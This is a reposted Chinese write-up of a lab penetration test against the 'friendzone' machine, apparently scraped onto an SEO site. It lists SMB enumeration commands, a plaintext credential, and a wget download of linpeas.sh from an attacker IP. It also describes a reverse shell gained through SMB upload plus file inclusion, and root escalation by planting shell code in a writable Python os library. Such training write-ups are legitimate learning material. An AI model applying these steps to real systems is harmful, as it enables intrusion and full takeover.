nmap漏洞扫描脚本 网络安全实战:记一次比较完整的靶机渗透

11/28 06:23:00 来源网站:seo优化-辅助卡盟平台

#这个工具的下载命令我直接放这里了! 
sudo apt install chromium-l10n
wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
unzip aquatone_linux_amd64_1.7.0.zip
sudo rm -rif aquatone_linux_amd64_1.7.0.zip LICENSE.txt README-cloudshell.txt
sudo mv aquatone /usr/local/bin

cat url |aquatone

下图是该工具出的报告。

我从报告中找到这么一个页面,尝试爆破后没结果,暂时放这。

0x03 SMB文件上传

因为前面nmap扫描结果显示该机器开放了smb服务,我们接下来对smb服务进行一波测试。

crackmapexec smb 10.10.10.123 -u "" -p "" --shares

发现Development 目录具有读权限和写权限,general目录有读权限。

smbclient //10.10.10.123/genera

通过找到的密码尝试登录。

admin:WORKWORKHhallelujah@#

成功进入后台。

0x04文件包含

根据页面提示加上如下参数后访问,发现出来一个时间戳。

怀疑此处存在文件包含于是进行测试。

通过上图我们可以看到,此处的确是存在一个本地文件包含漏洞,现在我们尝试读取dashboard文件,我们来看看它代码是怎么写的。

我们可以看到它直接通过get传参给include,然后后面接了.php。

结合之前发现的smb服务Development目录下的写权限,此时getshell的思路就很清晰了,先通过smb服务上传到Development目录下一个含有反弹shell代码的php文件,然后利用此处的文件包含漏洞即可getshell。

nmap 扫描所有端口_nmap 脚本扫描_nmap漏洞扫描脚本

0x05权限提升

python3 -m http.server 80

wget 10.10.16.3/linpeas.sh

我们在linpeas.sh的报告中看到如下文件,发现我们竟然对python的OS库有写权限。

那我们接下来就传pspy64到该机器上来,然后看看有没有以root用户定期执行的py脚本调用了os库,如果有的话,我们在OS库中写入反弹shell的代码,这样当该脚本被执行时,我们就会获得一个root权限的shell。

然后如上图所示,我们看到这个脚本是以root权限运行的,并且该脚本调用了OS库,所以接下来我们只需要在OS库中写入反弹shell的代码即可,如下图所示。

上图框中的代码就是我们加到os.py文件末尾反弹shell的代码,通过下图我们可以看到root权限的shell已经弹回来了。

friendzone靶机算是一个中等难度的靶机,知识点涉及到了DNS区域传输、SMB文件上传、文件包含、以及非常规的linux提权等知识。

总的来说,还是学到不少知识,包括DNS区域传输,SMB文件上传配合文件包含漏洞getshell,利用写入OS库恶意代码配合定时任务成功提权至root权限。

来源:【九爱网址导航www.fuzhukm.com】 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    暂无相关资讯
nmap漏洞扫描脚本 网络安全实战:记一次比较完整的靶机渗透